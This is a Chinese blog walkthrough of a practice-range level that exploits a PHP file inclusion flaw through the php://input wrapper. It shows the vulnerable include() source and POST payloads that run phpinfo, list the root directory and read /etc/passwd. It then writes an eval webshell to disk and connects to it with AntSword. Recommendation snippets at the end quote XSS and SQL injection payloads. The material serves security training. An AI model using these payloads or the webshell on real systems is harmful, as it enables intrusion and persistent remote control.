iwebsec靶场 文件包含漏洞通关笔记8-php://input伪协议利用

已于 2025-04-21 14:45:12 修改
阅读量983 收藏 4
点赞数
分类专栏: iwebsec靶场 文章标签: web安全 iwebsec 渗透测试 文件包含漏洞 phpinput伪协议
于 2023-09-14 15:31:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/128075019
版权

目录

原理分析

1.php://input伪协议原理

2.php://input伪协议使用条件

第08关 php://input伪协议利用

1.打开靶场

2.源码分析

3.伪协议渗透获取php信息

(1)构造post信息

(2)渗透

4.伪协议获取目录信息

(1)构造post信息

(2)渗透

5.伪协议获取敏感文件信息

(1)构造post信息

(2)渗透

5.伪协议上传木马

(1)构造webshell

(2)连接木马

(3)蚁剑连接

原理分析

本文通过《iwebsec靶场文件包含漏洞第八关 08 php://infput 伪协议原理》来进行渗透实战。

1.php://input伪协议原理

​php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行,如果存在文件包含漏洞,可将php://input作为文件名传入,同时在post中注入设置想要注入的代码,php执行时就会将post的内容作为php代码执行。特别注意php://input主要用于如下场景:

  • 读取原始的POST数据

  • 获取HTTP请求体(request body)内容

2.php://input伪协议使用条件

使用条件:

  • allow_url_include:on(默认Off)

  • allow_url_fopen: on

  • 可控制文件包含的参数

  • 能发送POST请求

第08关 php://input伪协议利用

1.打开靶场

http://iwebsec.com:81/fi/08.php

 

2.源码分析

 如上所示源码中使用include函数来进行文件包含,并未对参数filename进行过滤,存在文件包含漏洞。根据关卡提示可以使用php://input伪协议进行渗透。

<?php

  require_once('../header.php');
  ?>
<html>
	<head>
		<title>php://input伪协议利用</title>
	</head>
	<h2>php://input伪协议利用</h2>
		<div class="alert alert-success">
			<p>/08.php?filename=php://input </p>
		</div>
	<body>
<?php
	if(isset($_GET['filename'])){
	
    $filename  = $_GET['filename'];
    include($filename);
	}else{
		exit();
	}
	
?>

3.伪协议渗透获取php信息

(1)构造post信息

<?php phpinfo();?>

(2)渗透

如下所示,通过传入参数<?php phpinfo();?>来获取版本信息

4.伪协议获取目录信息

(1)构造post信息

<?php system("ls /");?>

(2)渗透

如下所示,通过传入参数<?php system("ls /");?>来获取根目录下文件信息

5.伪协议获取敏感文件信息

(1)构造post信息

<?php system("cat /etc/passwd");?>

(2)渗透

如下所示,通过传入参数<?php system("ls /");?>来获取根目录下文件信息

5.伪协议上传木马

(1)构造webshell

构造向当前目录下写一个木马文件的脚本ljn_cmd8.php,如下所示:

<?php fputs (fopen("ljn_cmd8.php","w"),'<?php eval($_POST[cmd]);?>');?>

使用POST将上述参数传入

(2)连接木马

上传的脚本url地址为

http://iwebsec.com:81/fi/ljn_cmd8.php

 参数为cmd,来获取php的信息,即cmd=phpinfo(); 如下所示渗透成功

(3)蚁剑连接

url为http://iwebsec.com:81/fi/ljn_cmd8.php 参数为cmd

添加后信息如下

如下所示渗透成功

php文件包含 伪协议
m0_64361111的博客
02-28 1176
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
API测试(一):PortSwigger靶场笔记
aaaadoga的博客
07-14 1105
这篇文章是于作者在学习PortSwigger的API Test类型漏洞时的记录和学习笔记
iwebsec靶场 文件包含漏洞通关笔记7-php://input伪协议(file_get_contents)
mooyuan的网络安全博客
09-14 518
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行,如果存在文件包含漏洞,可将php://input作为文件名传入,同时在post中注入设置想要注入的代码,php执行时就会将post的内容作为php代码执行。
iwebsec靶场文件包含漏洞-php://input伪协议利用
qq_56041380的博客
04-05 898
php://input可以访问请求的原始数据的只读流,即可以直接读取POST上没有经过解析的原始数据,但是使用enctype="multipart/form-data"的时候php://input是无效的。
PHP 伪协议:使用 php://input 访问原始 POST 数据
热门推荐
两个月亮
10-07 1万+
php://inputPHP 提供的一个伪协议,允许开发者 访问 POST 请求的原始内容。enable_post_data_reading 是 PHP 中的一个布尔配置项,该配置项决定了 是否在 PHP 启动时读取和解析 POST 数据以填充 $_POST 与 $_FILES 超全局变量。在 默认情况 下,enable_post_data_reading 是 开启 的。
PHP封装伪协议phpinput
m0_73720136的博客
05-07 612
通过本实验,利用PHP封装伪协议中的phpinput,发送POST数据(可利用火狐的插件,也可以利用Burp Suite抓包修改数据包)进行命令执行,可以执行操作系统命令,也可以在服务器端生成木马文件,用Webshell管理工具连接木马文件。
XSS-labs靶场通关笔记1-3
m0_65614852的博客
03-10 408
第一 如上图不难发现此突破点在url中 观察url中的参数name=test,我们不妨将test更改下试试看。 你会发现在源码<h2></h2>标签外输出,因此可以利用参数name来进行操作; 构造javascript代码: <script>alert()</script> <img src="" onerror="alert()"> // onerror 当图片连接地址错误是 执行onerror事件 第.
XSS-labs靶场通关笔记4-6
m0_65614852的博客
03-10 232
第四 输入<script>标签,很明显在输出点发现此将 < > 做了处理,所以此在不能闭合前面标签的情况下使用<script>标签,那么我们就在<input>标签中做手脚; 构造payload: onmouseout="alert()" 打上发现少了点东西...... 前面加上 “ 闭合value 再试下 成功!payload: "onmouseout="alert()" // 引号为英文状态下 onmouseout...
Sqli-labs全套(1-65)-通关笔记
TyRant的博客
04-10 4699
Basic Challenges 01-Error Based-Single quotes Error Based: 可以通过报错知道闭合方式 > paylod: ?id=1') and ;--+ 源码拼接后: SELECT * FROM users WHERE id=('$id') LIMIT 0,1; SELECT * FROM users WHERE id=('1') and ;-- ') LIMIT 0,1; > err: You have an error in your SQL
SSRF(一):PortSwigger靶场笔记
aaaadoga的博客
07-14 1032
该文章是于作者在PortSwigger的SSRF靶场训练的记录和学习笔记
ctfshow-web3(伪协议php://input利用
Welcome To Myon'Blog !
10-07 3114
这是一个只读信息流,当请求方式是post的,并且enctype不等于”multipart/form-data”时,可以使用php://input来获取原始请求的数据,当enctype等于”multipart/form-data”时php://input是无效的。利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码。,php执行时会将post内容当作文件内容,从而导致。存在文件包含时直接使用PHP伪协议。,当传入的参数作为文件名打开时,可以。
PHP 伪协议:使用 php://input 访问原始 POST 数据-转载
最新发布
luke的博客
09-01 819
值得注意的是,GET 请求通常不包含请求体,因为 GET 方法主要用于从服务器检索数据,其数据通常通过 URL 的查询字符串传递。然而,技术上讲,HTTP 规范并没有禁止 GET 请求携带请求体,虽然这不是常见的做法。这个特性是独立于 HTTP 请求的方法的,意味着它不仅可以在 POST 请求中使用,也可以在 GET 或其他 HTTP 方法的请求中使用。,当然你也可以自己输入 URL,URL 所指向的页面是插件将处理的页面,不一定需要是当前页面的 URL。配置项闭,则可以防止 PHP 的读取与解析。
6.level6-[本地复现]-[file_get_conents]-[php://input伪协议]
qwsn
12-29 2868
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录PHP反序列化漏洞level6-[本地复现]-[file_get_conents]-[php://input伪协议]1.题目描述2.代码审计3.解题过程4.总结 PHP反序列化漏洞 level6-[本地复现]-[file_get_conents]-[php://input伪协议] 1.题目描述 <?php error_reporting(0); include("flag.php"); class Flag{
PHP 伪协议
波吉桑
03-21 681
当深入了解 PHP 伪协议时,你会发现它们提供了丰富的功能,能够简化许多常见的任务,同时也需要谨慎处理以确保安全性。
PHP-伪协议
摘星怪sec的blog
04-25 7920
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
PHP伪协议
mr.king
06-14 340
layout: “post” title:PHP伪协议利用” date: “2019-06-12 21:39” 文件包含函数 include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file 首先归纳下常见的文件包含函数: inclu...
iwebsec靶场 文件包含漏洞通关笔记6-php://filter伪协议
mooyuan的网络安全博客
09-14 509
php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件行。如果我们对其进行编码,就可以任意文件读取。
php伪协议
qz362228的博客
04-23 4332
php伪协议1.php://协议2.php://filter伪协议3.php://input(读取POST数据)4.file://伪协议(读取文件内容)5.phar://伪协议(读取压缩包文件内容)6.zip://伪协议7.data://伪协议(读取文件)总结 1.php://协议 条件: allow_url_fopen:off/on allow_url_include :php://input php://stdin php://memory php://temp 需要on 作用: php://
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值